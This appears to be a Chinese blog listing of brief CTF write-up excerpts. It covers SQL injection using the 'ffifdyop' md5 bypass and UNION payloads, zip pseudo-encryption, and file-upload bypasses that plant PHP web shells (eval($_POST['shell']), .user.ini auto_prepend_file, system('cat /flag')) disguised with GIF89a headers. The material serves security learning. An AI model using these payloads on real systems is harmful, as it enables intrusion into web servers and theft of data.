摘要:
响应头里发现sql语句 select * from 'admin' where password=md5($pass,true) 看了大佬博客,这个可以用ffifdyop绕过,绕过原理是:ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9e 阅读全文
摘要:
看search.php 发现了一串base,先base32 再base64 然后我们还是像之前一样,确定一下列数: name=1' union select 1,2,3,4 %23 &pw=123 这样的话就报错了,然后再把4删掉,成功显示,这便确定了是3列 name=1' union select 阅读全文
摘要:
将其等宽高 阅读全文
摘要:
打开之后猜测是伪加密 09 变 00解压 发现是png的图片,没有文件头,添加89 50 4E 47 保存改后缀,查看 16进制转换得flag BJD{y1ngzuishuai} 阅读全文
摘要:
首先添加上传一个.user.ini GIF89a auto_prepend_file=a.jpg 再添加上传一个a.jpg GIF89a <script language='php'>system('cat /flag')</script> 在这里可以看到 uploads/33c6f8457bd77 阅读全文
摘要:
这个题我有两个思路。 1.绕过前端Js验证,phtml拓展名的应用 首先打开之后,写一个phtml文件 GIF89a <script language="php">eval($_POST['shell']);</script> 发现不允许上传phtml文件 猜想有js验证 F12查看 果然,将其删除 阅读全文
摘要:
打开之后啥信息都没有 题目的提示是backupFile备份文件 备份文件一般的后缀名为 .rar .zip .7z .tar.gz .bak .swp .txt .html .bak可以用dirsearch 扫 链接: dirsearch. 使用,试了很多备份文件,这里的备份文件是index.php 阅读全文
摘要:
发现让我们上传文件, 首先在桌面创建一个y.phtml的文件,内容为 GIF89a <script language="php">eval($_POST['shell']);</script> 然后我们将它上传,提交时使用bp截取,修改一下格式,再放行 我们使用蚁剑连接,猜测路径为upload 完整 阅读全文